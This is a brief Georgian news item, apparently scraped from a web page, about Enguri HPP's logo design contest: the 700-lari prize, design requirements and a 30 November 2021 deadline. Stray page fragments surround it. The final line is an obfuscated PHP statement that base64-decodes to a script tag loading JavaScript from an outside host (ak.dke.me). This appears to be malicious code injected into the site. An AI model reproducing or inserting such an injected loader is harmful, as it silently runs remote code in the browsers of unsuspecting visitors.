celsiusi
ავერსი შნაიდერი
კომპანია "ენგურჰესი" ლოგოს შექმნაზე კონკურსს აცხადებს - აღნიშნული განცხადება დასაქმების ვებგვერდ Jobs.ge-ზეა განთავსებული.
 
კომპანიის ინფორმაციით, ლოგოს შექმნისას ავტორმა უნდა გაითვალისწინოს კომპანიის ისტორია; მასშტაბი, რამეთუ „ენგურჰესი“ საქართველოში ყველაზე დიდი ჰიდროელექტროსადგურია, ენგურჰესის თაღოვანი კაშხალი მსოფლიოში უდიდესი თაღოვანი კაშხლების ათეულში შედის და მწვანე ენერგიის გამომუშავების უპირატესობა. კონკურსანტმა ლოგოზე ასახულ თითოეულ კომპონენტს განმარტება უნდა გაუკეთოს, რომელშიც აღწერილი იქნება, რისი გადმოცემა სურდა ამა თუ იმ კონკრეტული დეტალით.
 
„კონკურსში მონაწილეობისთვის დაიშვებიან მხოლოდ ფიზიკური პირები. სპეციალური კომისია გამოავლენს საუკეთესო ლოგოს ავტორს, რომელსაც გადაეცემა ფულადი ჯილდო 700 ლარი, კანონით გათვალისწინებული ყველა გადასახადის გარეშე“, - ნათქვამია განცხადებაში.
 
ნიმუშის წარმოდგენის ბოლო ვადაა 2021 წლის 30 ნოემბერი.
1035
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");